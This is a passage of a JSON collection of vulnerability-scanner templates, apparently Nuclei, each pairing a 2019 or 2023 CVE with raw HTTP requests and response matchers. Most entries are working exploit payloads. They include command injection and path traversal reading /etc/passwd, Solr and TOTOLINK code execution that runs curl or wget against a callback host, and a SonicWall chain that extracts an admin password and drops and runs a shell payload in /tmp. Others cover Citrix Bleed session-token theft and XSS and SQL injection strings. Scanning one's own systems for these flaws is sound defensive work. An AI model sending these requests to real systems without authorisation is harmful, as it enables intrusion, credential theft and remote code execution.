if}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","!contains(body_1, \"phpinfo\")","contains_all(body_2, \"phpinfo\",\"PHP Version\")"],"condition":"and"}]}]},{"id":"CVE-2019-12583","info":{"name":"Zyxel ZyWall UAG/USG - Account Creation Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/free_time.cgi"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["free_time_redirect.cgi?u=","&smsOnly=0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-0232","info":{"name":"Apache Tomcat `CGIServlet` enableCmdLineArguments - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /?&echo+{{sid}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{sid}}"]},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19985","info":{"name":"WordPress Email Subscribers & Newsletters <4.2.3 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=download_report&report=users&status=all"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Name","Email","Status","Created On"],"condition":"and"},{"type":"word","part":"header","words":["Content-Disposition: attachment; filename=all-contacts.csv;"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11581","info":{"name":"Atlassian Jira Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ContactAdministrators!default.jspa"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Contact Site Administrators"]},{"type":"word","part":"body","negative":true,"words":["has not yet configured this contact form"]},{"type":"regex","part":"body","regex":["\\(v4\\.4\\.","\\(v5\\.","\\(v6\\.","\\(v7\\.[012345789]\\.","\\(v7\\.1[0-2]\\.","\\(v7\\.6\\.([0-9]|[1][0-3])","\\(v7\\.\\13\\.[0-4]","\\(v8\\.0\\.[0-2]","\\(v8\\.1\\.[0-1]","\\(v8\\.2\\.[0-2]"],"condition":"or"}]}]},{"id":"CVE-2019-18665","info":{"name":"DOMOS 5.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16662","info":{"name":"rConfig 3.9.2 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8982","info":{"name":"Wavemaker Studio 6.6 - Local File Inclusion/Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1898","info":{"name":"Cisco RV110W RV130W RV215W Router - Information leakage","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/_syslog.txt"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(to_lower(body), \"ethernet\") && contains(to_lower(body), \"connection\")","contains(header, \"application/octet-stream\")"],"condition":"and"}]}]},{"id":"CVE-2019-20933","info":{"name":"InfluxDB <1.7.6 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"results\":","\"name\":\"databases\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17558","info":{"name":"Apache Solr <=8.3.1 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\n","POST /solr/{{core}}/config HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"update-queryresponsewriter\": {\n      \"startup\": \"lazy\",\n      \"name\": \"velocity\",\n      \"class\": \"solr.VelocityResponseWriter\",\n      \"template.base.dir\": \"\",\n      \"solr.resource.loader.enabled\": \"true\",\n      \"params.resource.loader.enabled\": \"true\"\n    }\n}\n","GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-17270","info":{"name":"Yachtcontrol Webapplication 1.0 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/systemcall.php?command=cat%20/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16278","info":{"name":"nostromo 1.9.6 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1\nHost: {{Hostname}}\n\necho\necho\ncat /etc/passwd 2>&1\n"],"matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2019-10475","info":{"name":"Jenkins build-metrics 1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1337)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3799","info":{"name":"Spring Cloud Config Server - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19824","info":{"name":"TOTOLINK Realtek SD Routers - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /boafrm/formSysCmd HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\nContent-Type: application/x-www-form-urlencoded\n\nsubmit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://{{interactsh-url}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-9618","info":{"name":"WordPress GraceMedia Media Player 1.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2019-10405","info":{"name":"Jenkins <=2.196 - Cookie Exposure","severity":"medium"},"requests":[{"raw":["GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n","GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","x-jenkins"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"body_2","words":["Cookie","JSESSIONID"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["x_jenkins"]}]}]},{"id":"CVE-2019-16920","info":{"name":"D-Link Routers - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}\n\nhtml_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/login_pic.asp\nCookie: uid=1234123\n\nhtml_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}}\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/login_pic.asp\nCookie: uid=1234123\n\nhtml_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\\\Windows\\\\win.ini')}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11370","info":{"name":"Carel pCOWeb <B1.2.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /config/pw_snmp_done.html HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n","GET /config/pw_snmp.html HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'value=\\\"\\\"><script>alert(document.domain)</script>\\\"></td>')"],"condition":"and"}]}]},{"id":"CVE-2019-3401","info":{"name":"Atlassian Jira <7.13.3/8.0.0-8.1.1 - Incorrect Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ManageFilters.jspa?filter=popular&filterView=popular"],"matchers":[{"type":"word","words":["<span data-filter-field=\"owner-full-name\">","<title>Manage Filters - Jira</title>"],"condition":"and"}]}]},{"id":"CVE-2019-14223","info":{"name":"Alfresco Share - Open Redirect","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/share/page/dologin"],"body":"success=%2Fshare%2Fpage%2F&failure=:\\\\interact.sh&username=baduser&password=badpass\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$"]}]}]},{"id":"CVE-2019-16759","info":{"name":"vBulletin 5.0.0-5.5.4 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20md5%28%22CVE-2019-16759%22%29%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["addcc9f9f2f40e2e6aca3079b73d9d17"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13396","info":{"name":"FlightPath - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncallback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["idden' name='form_token' value='([a-z0-9]+)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-11869","info":{"name":"WordPress Yuzo <5.12.94 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nyuzo_related_post_css_and_style=</style><script>alert(0);</script>\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_2, \"<script>alert(0);</script>\")"]},{"type":"dsl","dsl":["contains(tolower(header_2), 'text/html')"]}]}]},{"id":"CVE-2019-0193","info":{"name":"Apache Solr DataImportHandler <8.2.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n","POST /solr/{{core}}/dataimport?indent=on&wt=json HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/x-www-form-urlencoded\nX-Requested-With: XMLHttpRequest\n\ncommand=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-3396","info":{"name":"Atlassian Confluence Server - Path Traversal","severity":"critical"},"requests":[{"raw":["POST /rest/tinymce/1/macro/preview HTTP/1.1\nHost: {{Hostname}}\nReferer: {{Hostname}}\n\n{\"contentId\":\"786457\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https://www.viddler.com/v/23464dc5\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"../web.xml\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<param-name>contextConfigLocation</param-name>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15829","info":{"name":"Gallery Photoblocks < 1.1.43 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=photoblocks-edit&id=%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"post galleries!\")"],"condition":"and"}]}]},{"id":"CVE-2019-2579","info":{"name":"Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection","severity":"medium"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1\nHost: {{Hostname}}\n","POST /cs/ContentServer HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["value='&#39; and &#39;1&#39;=&#39;0 --","Use this utility to view and manage URLs"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"authkey","group":1,"regex":["NAME='_authkey_' VALUE='([0-9A-Z]+)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-6799","info":{"name":"phpMyAdmin <4.8.5 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET {{path}}?pma_servername={{interactsh-url}}&pma_username={{randstr}}&pma_password={{randstr}}&server=1 HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["/index.php","/pma/index.php","/pmd/index.php","/phpMyAdmin/index.php","/phpmyadmin/index.php","/_phpmyadmin/index.php"]},"attack":"batteringram","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 4.8.5')"]},{"type":"dsl","dsl":["compare_versions(version, '> 3.9.9')"]},{"type":"dsl","dsl":["compare_versions(phpversion, '< 7.3.4')"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","words":["mysqli_real_connect"]},{"type":"word","words":["pma_servername"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\\?v=([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["\\?v=([0-9.]+)"]},{"type":"regex","name":"phpversion","group":1,"regex":["X-Powered-By: PHP/([0-9.]+)"],"internal":true,"part":"header"}]}]},{"id":"CVE-2019-15858","info":{"name":"WordPress Woody Ad Snippets <2.2.5 - Cross-Site Scripting/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/insert-php/readme.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","negative":true,"words":["2.2.5"]},{"type":"word","part":"body","words":["Changelog"]},{"type":"word","part":"body","words":["Woody ad snippets"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16996","info":{"name":"Metinfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["1918835981"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1177","info":{"name":"Mlflow <2.2.1 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"file:///etc/\"}\n","GET /model-versions/get-artifact?path=passwd&name=AJAX-API&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-31548","info":{"name":"ChurchCRM v4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /FundRaiserEditor.php?linkBack=&FundRaiserID=-1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nFundRaiserSubmit=Save&Date=2023-06-24&Title=%22+onfocus%3D%22alert%28document.domain%29%22+autofocus%3D%22&Description=test\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=\\\"alert(document.domain)\\\" autofocus=\\\"\\\"></td>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-3765","info":{"name":"MLflow Absolute Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"is_dir\":","\"path\":","\"files\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0602","info":{"name":"Twittee Text Tweet <= 1.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ez2u4g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains_all(body_2, \"<script>alert(document.domain)</script>\", \"twittee\")"],"condition":"and"}]}]},{"id":"CVE-2023-43261","info":{"name":"Milesight Routers - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/lang/log/httpd.log"],"max-size":5000,"extractors":[{"type":"regex","regex":["\"username\":\"([^\"]+)\",\"password\":\"(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)\""]}]}]},{"id":"CVE-2023-39110","info":{"name":"rConfig 3.9.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=file://localhost/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["root:.*:0:0:"]},{"type":"word","part":"body_1","words":["rConfig"]},{"type":"status","part":"header_3","status":[200]}]}]},{"id":"CVE-2023-2822","info":{"name":"Ellucian Ethos Identity CAS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cas/logout?url=https://oast.pro\"><img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","Identity Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24044","info":{"name":"Plesk Obsidian <=18.0.49 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php"],"headers":{"Host":"oast.me"},"matchers-condition":"and","matchers":[{"type":"word","part":"location","words":["https://oast.me/login_up.php"]},{"type":"status","status":[303]}]}]},{"id":"CVE-2023-4966","info":{"name":"Citrix Bleed - Leaking Session Tokens","severity":"high"},"requests":[{"raw":["GET /oauth/idp/.well-known/openid-configuration HTTP/1.1\n{{str}}: {{Hostname}}\nHost: {{payload}}\n\n","POST /logon/LogonPoint/Authentication/GetUserName HTTP/1.1\nHost: {{Hostname}}\nCookie: NSC_AAAC={{session}}\n\n"],"unsafe":true,"extractors":[{"type":"regex","name":"session","part":"body_1","group":1,"regex":["([a-f0-9]{100}45525d5f4f58455e445a4a42)"],"internal":true},{"type":"regex","part":"body_2","regex":["([a-z0-9._]+)"]}],"matchers-condition":"and","matchers":[{"type":"word","words":["NSC_AAAC=","HTTP/1.1"]},{"type":"word","words":["{\"issuer\":"]}]}]},{"id":"CVE-2023-2948","info":{"name":"OpenEMR < 7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/library/custom_template/share_template.php?list_id=1}});}}alert(document.domain);function%20x(){if(1){a=({a:{a:1"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(body, \"list_id: 1}});}}alert(document.domain);\", \"select at least one Provider\", \"Save</span>\")"],"condition":"and"}]}]},{"id":"CVE-2023-34124","info":{"name":"SonicWall GMS and Analytics Web Services - Shell Injection","severity":"critical"},"requests":[{"raw":["GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27 HTTP/1.1\nHost: {{Hostname}}\nAuth: {\"user\": \"system\", \"hash\": \"{{base64(hex_decode(auth))}}\"}\n","GET /appliance/login HTTP/1.1\nHost: {{Hostname}}\n","POST /appliance/applianceMainPage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=login&skipSessionCheck=0&needPwdChange=0&clientHash={{ md5(concat(servertoken,replace_regex(alias,\"^.*:\",\"\"))) }}&password={{replace_regex(alias,\"^.*:\",\"\")}}&applianceUser={{replace_regex(alias,\":.*$\",\"\")}}&appliancePassword=Nice%20Try&ctlTimezoneOffset=0\n","POST /appliance/applianceMainPage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnum=3232150&action=file_system&task=search&item=application_log&criteria=*&width=500&searchFolder=%2Fopt%2FGMSVP%2Fetc%2F&searchFilter=appliance.jar%3Bbash+-c+PLUS%3d\\$\\(echo\\+-e\\+begin-base64\\+755\\+a\\\\\\\\nKwee\\\\\\\\n\\%3d\\%3d\\%3d\\%3d\\+\\|\\+uudecode\\+-o-\\)\\%3becho\\+-e\\+begin-base64\\+755\\+/tmp/.{{filename}}\\\\\\\\n{{replace(base64(callback),\"+\",\"${PLUS}\")}}\\\\\\\\n\\%3d\\%3d\\%3d\\%3d\\+|+uudecode+%3b/tmp/.{{filename}}%3brm+/tmp/.{{filename}}%3becho+\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["<title>SonicWall Universal Management Appliance</title>","<title>SonicWall Universal Management Host</title>"],"condition":"or"},{"type":"word","part":"interactsh_protocol","words":["dns"]}],"extractors":[{"type":"json","part":"body","internal":true,"name":"alias","group":1,"json":[".alias"]},{"type":"regex","part":"body","internal":true,"name":"servertoken","group":1,"regex":["getPwdHash.*,'([0-9]+)'"]}]}]},{"id":"CVE-2023-2780","info":{"name":"Mlflow <2.3.1 - Local File Inclusion Bypass","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"file://./etc\"}\n","GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-39560","info":{"name":"ECTouch v2 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /index.php?m=default&c=user&a=register&u=0 HTTP/1.1\nHost: {{Hostname}}\nReferer: 554fcae493e564ee0dc75bdf2ebf94cabought_notes|a:1:{s:2:\"id\";s:49:\"0&&updatexml(1,concat(0x7e,(database()),0x7e),1)#\";}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["XPATH syntax error: '~[^~]+~'<br>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","group":1,"regex":["XPATH syntax error: 